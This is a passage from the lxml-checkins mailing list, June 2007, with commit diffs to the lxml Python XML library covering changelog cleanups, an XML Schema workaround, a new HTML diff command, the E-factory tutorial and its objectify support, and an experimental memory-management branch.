in objectify: new ``xsiannotate()`` function + +* EXSLT RegExp support in standard XPath (not only XSLT) + Bugs fixed ---------- @@ -21,30 +38,21 @@ Features added -------------- -* Parsers take a ``remove_comments`` keyword argument that skips over comments +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class -* Entity support through an ``Entity`` factory and element classes. XML - parsers now have a ``resolve_entities`` keyword argument that can be set to - False to keep entities in the document. +* Parsers take a ``remove_comments`` keyword argument that skips over comments * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. -* ``column`` field on error log entries to accompany the ``line`` field - -* Error specific messages in XPath parsing and evaluation - NOTE: for evaluation errors, you will now get an XPathEvalError instead of - an XPathSyntaxError. To catch both, you can except on ``XPathError`` - -* The regular expression functions in XPath now support passing a node-set - instead of a string - * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node * ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods * Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions + plus new ``deannotate()`` function * Support for custom Element class instantiation in lxml.sax: passing a ``makeelement`` function to the ElementTreeContentHandler will reuse the @@ -52,16 +60,24 @@ * '.' represents empty ObjectPath (identity) -* EXSLT RegExp support in standard XPath (not only XSLT) - -* ``lxml.pyclasslookup`` module that can access the entire tree in read-only - mode to help determining a suitable Element class - * ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` * ``collectAttributes()`` C-function to build a list of attribute keys/values/items for a libxml2 node +* ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) + +* HTML generator helpers by Fredrik Lundh in ``lxml.htmlbuilder`` + +* ``ElementMaker`` XML generator by Fredrik Lundh in ``lxml.builder.E`` + +* Support for pickeling ``objectify.ObjectifiedElement`` objects to XML + +* ``update()`` method on Element.attrib + +* Optimised replacement for libxml2's _xmlReconsiliateNs(). This allows lxml + a better handling of namespaces when moving elements between documents. + Bugs fixed ---------- @@ -102,40 +118,14 @@ * Raise AssertionError when passing strings containing '\0' bytes -Other changes -------------- - -* major refactoring in XPath/XSLT extension function code - - -1.3beta (2007-02-27) -==================== - -Features added --------------- - -* ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) - -* HTML generator helpers by Fredrik Lundh in ``lxml.htmlbuilder`` - -* ``ElementMaker`` XML generator by Fredrik Lundh in ``lxml.builder.E`` - -* Support for pickeling ``objectify.ObjectifiedElement`` objects to XML - -* ``update()`` method on Element.attrib - -* Optimised replacement for libxml2's _xmlReconsiliateNs(). This allows lxml - a better handling of namespaces when moving elements between documents. - -Bugs fixed ----------- - * Possible memory leaks in namespace handling when moving elements between documents Other changes ------------- +* major refactoring in XPath/XSLT extension function code + * major restructuring in the documentation From scoder at codespeak.net Mon Jun 25 16:22:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:22:17 +0200 (CEST) Subject: [Lxml-checkins] r44510 - lxml/trunk Message-ID: <20070625142217.C7B6980E4@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:22:17 2007 New Revision: 44510 Modified: lxml/trunk/CHANGES.txt Log: changelog cleanup after release of 1.3 Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 16:22:17 2007 @@ -28,9 +28,20 @@ Bugs fixed ---------- +* The XML parser did not report undefined entities as error + +* The text in exceptions raised by XML parsers, validators and XPath + evaluators now reports the first error that occurred instead of the last + +* passing '' as XPath namespace prefix did not raise an error + +* Thread safety in XPath evaluators + Other changes ------------- +* major refactoring in XPath/XSLT extension function code + 1.3 (2007-06-24) ================ @@ -89,18 +100,14 @@ * Replacing the children slice of an Element would cut off the tails of the original children -* API functions now check incoming strings for XML conformity. Zero bytes or - low ASCII characters are no longer accepted. - -* The XML parser did not report undefined entities as error +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags -* The text in exceptions raised by XML parsers, validators and XPath - evaluators now reports the first error that occurred instead of the last +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted (AssertionError). * XSLT parsing failed to pass resolver context on to imported documents -* passing '' as XPath namespace prefix did not raise an error - * passing '' as namespace prefix in nsmap could be passed through to libxml2 * Objectify couldn't handle prefixed XSD type names in ``xsi:type`` @@ -114,18 +121,12 @@ * lxml.sax failed on comments and PIs. Comments are now properly ignored and PIs are copied. -* Thread safety in XPath evaluators - -* Raise AssertionError when passing strings containing '\0' bytes - * Possible memory leaks in namespace handling when moving elements between documents Other changes ------------- -* major refactoring in XPath/XSLT extension function code - * major restructuring in the documentation From scoder at codespeak.net Mon Jun 25 16:22:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:22:24 +0200 (CEST) Subject: [Lxml-checkins] r44511 - lxml/branch/lxml-1.3 Message-ID: <20070625142224.8911980E9@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:22:24 2007 New Revision: 44511 Modified: lxml/branch/lxml-1.3/CHANGES.txt Log: changelog cleanup after release of 1.3 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Mon Jun 25 16:22:24 2007 @@ -8,8 +8,9 @@ Features added -------------- -* Module ``lxml.pyclasslookup`` implemens an Element class lookup scheme that - can access the entire tree to determine a suitable Element class +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class * Parsers take a ``remove_comments`` keyword argument that skips over comments @@ -18,6 +19,8 @@ * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods + * Extended type annotation in objectify: cleaner annotation namespace setup plus new ``deannotate()`` function @@ -27,6 +30,11 @@ * '.' represents empty ObjectPath (identity) +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` + +* ``collectAttributes()`` C-function to build a list of attribute + keys/values/items for a libxml2 node + Bugs fixed ---------- @@ -42,13 +50,15 @@ ``ProcessingInstruction`` as tags * API functions now check incoming strings for XML conformity. Zero bytes or - low ASCII characters are no longer accepted. + low ASCII characters are no longer accepted (AssertionError). * XSLT parsing failed to pass resolver context on to imported documents -* More ET compatible behaviour when writing out XML declarations or not +* passing '' as namespace prefix in nsmap could be passed through to libxml2 -* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods +* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` + +* More ET compatible behaviour when writing out XML declarations or not * More robust error handling in ``iterparse()`` @@ -57,8 +67,6 @@ * lxml.sax failed on comments and PIs. Comments are now properly ignored and PIs are copied. -* Raise AssertionError when passing strings containing '\0' bytes - 1.3beta (2007-02-27) ==================== From scoder at codespeak.net Mon Jun 25 16:56:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:56:12 +0200 (CEST) Subject: [Lxml-checkins] r44514 - lxml/trunk/src/lxml Message-ID: <20070625145612.3A1CB80B5@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:56:11 2007 New Revision: 44514 Modified: lxml/trunk/src/lxml/xmlschema.pxi Log: libxml2 crash bug in xmlschema is not fixed in 2.6.24 Modified: lxml/trunk/src/lxml/xmlschema.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlschema.pxi (original) +++ lxml/trunk/src/lxml/xmlschema.pxi Mon Jun 25 16:56:11 2007 @@ -38,12 +38,12 @@ root_node = _rootNodeOrRaise(etree) # work around for libxml2 bug if document is not XML schema at all - if _LIBXML_VERSION_INT < 20624: - c_node = root_node._c_node - c_href = _getNs(c_node) - if c_href is NULL or \ - cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: - raise XMLSchemaParseError, "Document is not XML Schema" + #if _LIBXML_VERSION_INT < 20624: + c_node = root_node._c_node + c_href = _getNs(c_node) + if c_href is NULL or \ + cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: + raise XMLSchemaParseError, "Document is not XML Schema" fake_c_doc = _fakeRootDoc(doc._c_doc, root_node._c_node) self._error_log.connect() From ianb at codespeak.net Mon Jun 25 21:01:53 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Mon, 25 Jun 2007 21:01:53 +0200 (CEST) Subject: [Lxml-checkins] r44525 - lxml/branch/html/src/lxml/html Message-ID: <20070625190153.CD50180E4@code0.codespeak.net> Author: ianb Date: Mon Jun 25 21:01:53 2007 New Revision: 44525 Added: lxml/branch/html/src/lxml/html/_diffcommand.py Modified: lxml/branch/html/src/lxml/html/diff.py Log: Added the start of a diffing command-line Added: lxml/branch/html/src/lxml/html/_diffcommand.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/_diffcommand.py Mon Jun 25 21:01:53 2007 @@ -0,0 +1,87 @@ +import optparse +import sys +import re +import os +from lxml.html.diff import htmldiff + +description = """\ +""" + +parser = optparse.OptionParser( + usage="%prog [OPTIONS] FILE1 FILE2\n" + "%prog --annotate [OPTIONS] INFO1 FILE1 INFO2 FILE2 ...", + description=description, + ) + +parser.add_option( + '-o', '--output', + metavar="FILE", + dest="output", + default="-", + help="File to write the difference to", + ) + +parser.add_option( + '-a', '--annotation', + action="store_true", + dest="annotation", + help="Do an annotation") + +def main(args=None): + if args is None: + args = sys.argv[1:] + options, args = parser.parse_args(args) + if options.annotation: + return annotate(options, args) + if len(args) != 2: + print 'Error: you must give two files' + parser.print_help() + sys.exit(1) + file1, file2 = args + input1 = read_file(file1) + input2 = read_file(file2) + body1 = split_body(input1)[1] + pre, body2, post = split_body(input2) + result = htmldiff(body1, body2) + result = pre + result + post + if options.output == '-': + if not result.endswith('\n'): + result += '\n' + sys.stdout.write(result) + else: + f = open(options.output, 'wb') + f.write(result) + f.close() + +def read_file(filename): + if filename == '-': + c = sys.stdin.read() + elif not os.path.exists(filename): + raise OSError( + "Input file %s does not exist" % filename) + else: + f = open(filename, 'rb') + c = f.read() + f.close() + return c + +body_start_re = re.compile( + r"", re.I|re.S) +body_end_re = re.compile( + r"", re.I|re.S) + +def split_body(html): + match = body_start_re.search(html) + if match: + pre = html[:match.end()] + html = html[match.end():] + match = body_end_re.search(html) + if match: + post = html[match.start():] + html = html[:match.start()] + return pre, html, post + +def annotate(options, args): + print "Not yet implemented" + sys.exit(1) + Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Mon Jun 25 21:01:53 2007 @@ -865,27 +865,8 @@ return [item for item in actual if item[2] > threshold or not item[2]] - -# def get_matching_blocks(self): -# size = min(len(self.b), len(self.b)) -# threshold = min(self.threshold, size / 4) -# actual = difflib.SequenceMatcher.get_matching_blocks(self) -# last_equal_a = 0 -# eliminate = [] -# for i in xrange(1, len(actual)-1): -# start_diff_length = actual[i][0] - (actual[i-1][0] + actual[i-1][2]) -# end_diff_length = actual[i+1][0] -# for a_pos, b_pos, length in actual: -# if (last_equal_a - a_pos is big -# and length is small -# and next_equal_a is far away): -# continue -# result.append((a_pos, b_pos, length)) -# last_equal_a = a_pos+length -# return result - if __name__ == '__main__': - import doctest - doctest.testmod() - + from lxml.html import _diffcommand + _diffcommand.main() + From scoder at codespeak.net Mon Jun 25 21:40:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:40:48 +0200 (CEST) Subject: [Lxml-checkins] r44526 - in lxml/branch/html/src/lxml: . html Message-ID: <20070625194048.30F8980D5@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:40:45 2007 New Revision: 44526 Added: lxml/branch/html/src/lxml/html/builder.py - copied, changed from r44515, lxml/branch/html/src/lxml/htmlbuilder.py Removed: lxml/branch/html/src/lxml/htmlbuilder.py Log: integrated lxml.htmlbuilder with lxml.html as lxml.html.builder Copied: lxml/branch/html/src/lxml/html/builder.py (from r44515, lxml/branch/html/src/lxml/htmlbuilder.py) ============================================================================== --- lxml/branch/html/src/lxml/htmlbuilder.py (original) +++ lxml/branch/html/src/lxml/html/builder.py Mon Jun 25 21:40:45 2007 @@ -24,7 +24,10 @@ """ -from builder import E +from lxml.builder import ElementMaker +from lxml.html import html_parser + +E = ElementMaker(makeelement=html_parser.makeelement) # elements A = E.a # anchor Deleted: /lxml/branch/html/src/lxml/htmlbuilder.py ============================================================================== --- /lxml/branch/html/src/lxml/htmlbuilder.py Mon Jun 25 21:40:45 2007 +++ (empty file) @@ -1,125 +0,0 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh - -Usage:: - - >>> from lxml.htmlbuilder import * - >>> html = HTML( - ... HEAD( TITLE("Hello World") ), - ... BODY( CLASS("main"), - ... H1("Hello World !") - ... ) - ... ) - - >>> import lxml.etree - >>> print lxml.etree.tostring(html, pretty_print=True) - - - Hello World - - -

Hello World !

- - - -""" - -from builder import E - -# elements -A = E.a # anchor -ABBR = E.abbr # abbreviated form (e.g., WWW, HTTP, etc.) -ACRONYM = E.acronym # -ADDRESS = E.address # information on author -APPLET = E.applet # Java applet (DEPRECATED) -AREA = E.area # client-side image map area -B = E.b # bold text style -BASE = E.base # document base URI -BASEFONT = E.basefont # base font size (DEPRECATED) -BDO = E.bdo # I18N BiDi over-ride -BIG = E.big # large text style -BLOCKQUOTE = E.blockquote # long quotation -BODY = E.body # document body -BR = E.br # forced line break -BUTTON = E.button # push button -CAPTION = E.caption # table caption -CENTER = E.center # shorthand for DIV align=center (DEPRECATED) -CITE = E.cite # citation -CODE = E.code # computer code fragment -COL = E.col # table column -COLGROUP = E.colgroup # table column group -DD = E.dd # definition description -DEL = getattr(E, 'del') # deleted text -DFN = E.dfn # instance definition -DIR = E.dir # directory list (DEPRECATED) -DIV = E.div # generic language/style container -DL = E.dl # definition list -DT = E.dt # definition term -EM = E.em # emphasis -FIELDSET = E.fieldset # form control group -FONT = E.font # local change to font (DEPRECATED) -FORM = E.form # interactive form -FRAME = E.frame # subwindow -FRAMESET = E.frameset # window subdivision -H1 = E.h1 # heading -H2 = E.h2 # heading -H3 = E.h3 # heading -H4 = E.h4 # heading -H5 = E.h5 # heading -H6 = E.h6 # heading -HEAD = E.head # document head -HR = E.hr # horizontal rule -HTML = E.html # document root element -I = E.i # italic text style -IFRAME = E.iframe # inline subwindow -IMG = E.img # Embedded image -INPUT = E.input # form control -INS = E.ins # inserted text -ISINDEX = E.isindex # single line prompt (DEPRECATED) -KBD = E.kbd # text to be entered by the user -LABEL = E.label # form field label text -LEGEND = E.legend # fieldset legend -LI = E.li # list item -LINK = E.link # a media-independent link -MAP = E.map # client-side image map -MENU = E.menu # menu list (DEPRECATED) -META = E.meta # generic metainformation -NOFRAMES = E.noframes # alternate content container for non frame-based rendering -NOSCRIPT = E.noscript # alternate content container for non script-based rendering -OBJECT = E.object # generic embedded object -OL = E.ol # ordered list -OPTGROUP = E.optgroup # option group -OPTION = E.option # selectable choice -P = E.p # paragraph -PARAM = E.param # named property value -PRE = E.pre # preformatted text -Q = E.q # short inline quotation -S = E.s # strike-through text style (DEPRECATED) -SAMP = E.samp # sample program output, scripts, etc. -SCRIPT = E.script # script statements -SELECT = E.select # option selector -SMALL = E.small # small text style -SPAN = E.span # generic language/style container -STRIKE = E.strike # strike-through text (DEPRECATED) -STRONG = E.strong # strong emphasis -STYLE = E.style # style info -SUB = E.sub # subscript -SUP = E.sup # superscript -TABLE = E.table # -TBODY = E.tbody # table body -TD = E.td # table data cell -TEXTAREA = E.textarea # multi-line text field -TFOOT = E.tfoot # table footer -TH = E.th # table header cell -THEAD = E.thead # table header -TITLE = E.title # document title -TR = E.tr # table row -TT = E.tt # teletype or monospaced text style -U = E.u # underlined text style (DEPRECATED) -UL = E.ul # unordered list -VAR = E.var # instance of a variable or program argument - -# attributes (only reserved words are included here) -ATTR = dict -def CLASS(v): return {'class': v} -def FOR(v): return {'for': v} From scoder at codespeak.net Mon Jun 25 21:49:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:49:02 +0200 (CEST) Subject: [Lxml-checkins] r44527 - lxml/trunk/doc Message-ID: <20070625194902.53AE580A3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:49:01 2007 New Revision: 44527 Modified: lxml/trunk/doc/tutorial.txt Log: namespaces and the E-factory Modified: lxml/trunk/doc/tutorial.txt ============================================================================== --- lxml/trunk/doc/tutorial.txt (original) +++ lxml/trunk/doc/tutorial.txt Mon Jun 25 21:49:01 2007 @@ -31,8 +31,8 @@ >>> from lxml import etree If your code only uses the ElementTree API and does not rely on any -functionality that is specific to ``lxml.etree``, you can also use the -following import chain as a fall-back to the original ElementTree:: +functionality that is specific to ``lxml.etree``, you can also use (any part +of) the following import chain as a fall-back to the original ElementTree:: try: from lxml import etree @@ -108,7 +108,7 @@ ------------------ To make the access to these subelements as easy and straight forward as -possible, elements behave exactly like normal Python lists:: +possible, elements behave like normal Python lists:: >>> child = root[0] >>> print child.tag @@ -133,7 +133,7 @@ >>> print end[0].tag child3 - >>> root[0] = root[-1] + >>> root[0] = root[-1] # this moves the element! >>> for child in root: ... print child.tag child3 @@ -239,9 +239,9 @@ >>> print etree.tostring(root) TEXT -In many XML documents (so-called *data-centric* documents), this is the only -place where text can be found. It is encapsulated by a leaf tag at the very -bottom of the tree hierarchy. +In many XML documents (*data-centric* documents), this is the only place where +text can be found. It is encapsulated by a leaf tag at the very bottom of the +tree hierarchy. However, if XML is used for tagged text documents such as (X)HTML, text can also appear between different elements, right in the middle of the tree:: @@ -249,9 +249,9 @@ Hello
World Here, the ``
`` tag is surrounded by text. This is often referred to as -*document-style* XML. Elements support this through their ``tail`` property. -It contains the text that directly follows the element, up to the next element -in the XML tree:: +*document-style* or *mixed-content* XML. Elements support this through their +``tail`` property. It contains the text that directly follows the element, up +to the next element in the XML tree:: >>> html = etree.Element("html") >>> body = etree.SubElement(html, "body") @@ -280,8 +280,8 @@ If you want to use this more often, you can wrap it in a function:: - >>> buildTextList = etree.XPath("//text()") # lxml.etree only! - >>> print buildTextList(html) + >>> build_text_list = etree.XPath("//text()") # lxml.etree only! + >>> print build_text_list(html) ['TEXT', 'TAIL'] .. _XPath: xpathxslt.html#xpath @@ -344,9 +344,148 @@ The parse() function -------------------- + Namespaces ========== +The ElementTree API avoids `namespace prefixes`_ wherever possible and deploys +the real namespaces instead:: + + >>> xhtml = etree.Element("{http://www.w3.org/1999/xhtml}html") + >>> body = etree.SubElement(xhtml, "{http://www.w3.org/1999/xhtml}body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +.. _`namespace prefixes`: http://www.w3.org/TR/xml-names/#ns-qualnames + +As you can see, prefixes only become important when you serialise the result. +However, the above code becomes somewhat verbose due to the lengthy namespace +names. And retyping or copying a string over and over again is error prone. +It is therefore common practice to store a namespace URI in a global variable. +To adapt the namespace prefixes for serialisation, you can also pass a mapping +to the Element factory, e.g. to define the default namespace:: + + >>> XHTML_NAMESPACE = "http://www.w3.org/1999/xhtml" + >>> XHTML = "{%s}" % XHTML_NAMESPACE + + >>> NSMAP = {None : XHTML_NAMESPACE} # the default namespace (no prefix) + + >>> xhtml = etree.Element(XHTML + "html", nsmap=NSMAP) # lxml only! + >>> body = etree.SubElement(xhtml, XHTML + "body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +Namespaces on attributes work alike:: + + >>> body.set(XHTML + "bgcolor", "#CCFFAA") + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + + >>> print body.get("bgcolor") + None + >>> body.get(XHTML + "bgcolor") + '#CCFFAA' + +You can also use XPath in this way:: + + >>> find_xhtml_body = etree.ETXPath( # lxml only ! + ... "//{%s}body" % XHTML_NAMESPACE) + >>> results = find_xhtml_body(xhtml) + + >>> print results[0].tag + {http://www.w3.org/1999/xhtml}body + + +The E-factory +============= + +The ``E-factory`` provides a simple and compact syntax for generating XML and +HTML:: + + >>> from lxml.builder import E + + >>> def CLASS(*args): # class is a reserved word in Python + ... return {"class":' '.join(args)} + + >>> html = page = ( + ... E.html( # create an Element called "html" + ... E.head( + ... E.title("This is a sample document") + ... ), + ... E.body( + ... E.h1("Hello!", CLASS("title")), + ... E.p("This is a paragraph with ", E.b("bold"), " text in it!"), + ... E.p("This is another paragraph, with a ", + ... E.a("link", href="http://www.python.org"), "."), + ... E.p("Here are some reservered characters: ."), + ... etree.XML("

And finally an embedded XHTML fragment.

"), + ... ) + ... ) + ... ) + + >>> print etree.tostring(page, pretty_print=True) + + + This is a sample document + + +

Hello!

+

This is a paragraph with bold text in it!

+

This is another paragraph, with a link.

+

Here are some reservered characters: <spam&egg>.

+

And finally an embedded XHTML fragment.

+ + + +The Element creation based on attribute access makes it easy to build up a +simple vocabulary for an XML language:: + + >>> DOC = E.doc + >>> TITLE = E.title + >>> SECTION = E.section + >>> PAR = E.par + + >>> my_doc = DOC( + ... TITLE("The dog and the hog"), + ... SECTION( + ... TITLE("The dog"), + ... PAR("Once upon a time, ..."), + ... PAR("And then ...") + ... ), + ... SECTION( + ... TITLE("The hog"), + ... PAR("Sooner or later ...") + ... ) + ... ) + + >>> print etree.tostring(my_doc, pretty_print=True) + + The dog and the hog +
+ The dog + Once upon a time, ... + And then ... +
+
+ The hog + Sooner or later ... +
+
+ +One such example is the module ``lxml.html.builder``, which provides a +vocabulary for HTML. + ElementPath =========== From scoder at codespeak.net Mon Jun 25 21:52:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:52:22 +0200 (CEST) Subject: [Lxml-checkins] r44528 - in lxml/trunk: . doc src/lxml Message-ID: <20070625195222.7216E80D1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:52:21 2007 New Revision: 44528 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/objectify.txt lxml/trunk/src/lxml/builder.py lxml/trunk/src/lxml/objectify.pyx Log: support E-factory in objectify Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 21:52:21 2007 @@ -8,6 +8,8 @@ Features added -------------- +* E-factory support for lxml.objectify (``objectify.E``) + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Mon Jun 25 21:52:21 2007 @@ -267,6 +267,25 @@ notB +Tree generation with the E-factory +---------------------------------- + +To simplify the generation of trees even further, you can use the E-factory:: + + >>> E = objectify.E + >>> root = E.root( + ... E.a("5"), + ... E.b("6") + ... ) + + >>> print etree.tostring(root, pretty_print=True) + + 5 + 6 + + + + Namespace handling ------------------ Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Mon Jun 25 21:52:21 2007 @@ -140,7 +140,10 @@ elem[-1].tail = (elem[-1].tail or "") + item else: elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text + if str not in typemap: + typemap[str] = add_text + if unicode not in typemap: + typemap[unicode] = add_text def add_dict(elem, item): attrib = elem.attrib @@ -149,7 +152,8 @@ attrib[k] = v else: attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict + if dict not in typemap: + typemap[dict] = add_dict self._typemap = typemap Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Mon Jun 25 21:52:21 2007 @@ -65,6 +65,8 @@ cdef object islice from itertools import islice +cdef object _ElementMaker +from builder import ElementMaker as _ElementMaker # namespace/name for "pytype" hint attribute cdef object PYTYPE_NAMESPACE @@ -1846,6 +1848,34 @@ parser = objectify_parser return _parse(f, parser) +class ElementMaker(_ElementMaker): + def __init__(self, typemap=None): + if typemap is None: + typemap = {} + else: + typemap = typemap.copy() + + typemap[__builtin__.str] = __add_text + typemap[__builtin__.unicode] = __add_text + + _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) + +def __add_text(cetree._Element elem not None, text): + cdef tree.xmlNode* c_child + c_child = cetree.findChildBackwards(elem._c_node, 0) + if c_child is not NULL: + old = cetree.tailOf(c_child) + if old is not None: + text = old + text + cetree.setTailText(c_child, text) + else: + old = cetree.textOf(elem._c_node) + if old is not None: + text = old + text + cetree.setNodeText(elem._c_node, text) + +E = ElementMaker() + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, "xsi" : XML_SCHEMA_INSTANCE_NS, From scoder at codespeak.net Mon Jun 25 22:18:57 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 22:18:57 +0200 (CEST) Subject: [Lxml-checkins] r44529 - in lxml/trunk: doc src/lxml Message-ID: <20070625201857.7CF6180D1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 22:18:57 2007 New Revision: 44529 Modified: lxml/trunk/doc/objectify.txt lxml/trunk/src/lxml/objectify.pyx Log: support more data types on objectify.E Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Mon Jun 25 22:18:57 2007 @@ -274,14 +274,18 @@ >>> E = objectify.E >>> root = E.root( - ... E.a("5"), - ... E.b("6") + ... E.a(5), + ... E.b(6.1), + ... E.c(True), + ... E.d("how") ... ) >>> print etree.tostring(root, pretty_print=True) 5 - 6 + 6.1 + true + how Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Mon Jun 25 22:18:57 2007 @@ -1857,11 +1857,19 @@ typemap[__builtin__.str] = __add_text typemap[__builtin__.unicode] = __add_text + typemap[__builtin__.int] = __add_text + typemap[__builtin__.long] = __add_text + typemap[__builtin__.float] = __add_text + typemap[__builtin__.bool] = __add_text _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) -def __add_text(cetree._Element elem not None, text): +def __add_text(_Element elem not None, text): cdef tree.xmlNode* c_child + if isinstance(text, bool): + text = str(text).lower() + else: + text = str(text) c_child = cetree.findChildBackwards(elem._c_node, 0) if c_child is not NULL: old = cetree.tailOf(c_child) From scoder at codespeak.net Tue Jun 26 15:00:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 26 Jun 2007 15:00:01 +0200 (CEST) Subject: [Lxml-checkins] r44544 - lxml/branch/proxy-dealloc/src/lxml Message-ID: <20070626130001.7921980D7@code0.codespeak.net> Author: scoder Date: Tue Jun 26 15:00:01 2007 New Revision: 44544 Modified: lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi lxml/branch/proxy-dealloc/src/lxml/etree.pyx lxml/branch/proxy-dealloc/src/lxml/proxy.pxi Log: trial version that stores pointers to disconnected tree fragments in the document (not working yet) Modified: lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi (original) +++ lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi Tue Jun 26 15:00:01 2007 @@ -98,6 +98,7 @@ If 'c_doc' is also NULL, a new xmlDoc will be created. """ cdef xmlNode* c_node + cdef _Element element ns_utf, name_utf = _getNsTag(tag) if doc is not None: c_doc = doc._c_doc @@ -115,7 +116,9 @@ # add namespaces to node if necessary doc._setNodeNamespaces(c_node, ns_utf, nsmap) _initNodeAttributes(c_node, doc, attrib, extra_attrs) - return _elementFactory(doc, c_node) + element = _elementFactory(doc, c_node) + _markNodeDisconnected(doc, c_node) + return element except: # free allocated c_node/c_doc unless Python does it for us if c_node.doc is not c_doc: @@ -482,11 +485,12 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): +cdef void _removeNode(_Document doc, xmlNode* c_node): """Unlink and free a node and subnodes if possible. """ tree.xmlUnlinkNode(c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + _markNodeDisconnected(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -514,7 +518,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -528,7 +533,7 @@ if _isElement(c_node): _removeText(c_node.next) c_next = c_node.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node Modified: lxml/branch/proxy-dealloc/src/lxml/etree.pyx ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/etree.pyx (original) +++ lxml/branch/proxy-dealloc/src/lxml/etree.pyx Tue Jun 26 15:00:01 2007 @@ -233,8 +233,11 @@ """ cdef int _ns_counter cdef xmlDoc* _c_doc + cdef xmlNode** _disconnected_nodes + cdef cstd.size_t _disconnected_nodes_count + cdef cstd.size_t _disconnected_nodes_max cdef _BaseParser _parser - + def __dealloc__(self): # if there are no more references to the document, it is safe # to clean the whole thing up, as all nodes have a reference to @@ -244,7 +247,8 @@ #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, 